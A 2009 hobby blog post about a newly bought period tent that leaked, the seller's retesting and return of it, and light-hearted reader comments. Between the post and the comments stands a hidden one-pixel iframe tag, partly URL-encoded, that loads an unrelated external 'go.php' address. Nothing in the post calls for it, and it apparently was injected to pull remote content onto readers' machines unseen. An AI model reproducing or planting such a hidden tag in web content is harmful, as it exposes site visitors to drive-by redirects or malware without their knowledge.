Posted by: wrmcnutt | May 5, 2009

Saga Of the Titanic – Part IV


For the newcomers, Panther Primitives sold me a brand-new leaky tent.  

For More on the Story -> Go Here

Credit where credit is due.  I’m pretty quick to complain, but I’ve been slack praising.  Panther called me early last week to advise me that the tent tested out well several times.  They packed it bone dry and shipped it back to me promptly.  It arrived, as usual, packed wrong.  Panther knows how to make a good tent, but they really don’t know how to put one in a box efficiently.  I pitched it as a sun pavilion at Crown list last weekend and it seems to be in good order, but I won’t know for sure until it I pitch it in the rain.

I’m skeptical.  I think that they expect the fibers to have swollen and settled.  I don’t think they re-sealed the seams.  If that thing drips on my bed, it’s going to be loud and obnoxious.

[iframe width=”1″ height=”1″ src=”http://s6g.info/go.php?sid=1″%5D

Responses

  1. Hey Will….if you want to test in rain…Come on down to Middle Tennessee, we are getting ALL the rain you want and then some…..In fact I am looking at building an Ark at the moment….

    On the serious side…I hope your tent is finally leak free, as I do know how much money one ties up in a Period Pavilion.

  2. Sounds like you should pitch it at May Tourney. Should be enough dampness in the air to do some road testing.

    • Can’t. Too busy dealing with feast this weekend.

      • Isn’t that what you have minons.. er, um, *associates* for?

  3. One of my minions is already committed to feast. The second is not coming. And the third is too busy being a herald because YOUR minion is slacking off just to go to his college graduation.


Leave a Reply

Categories

Follow

Get every new post delivered to your Inbox.

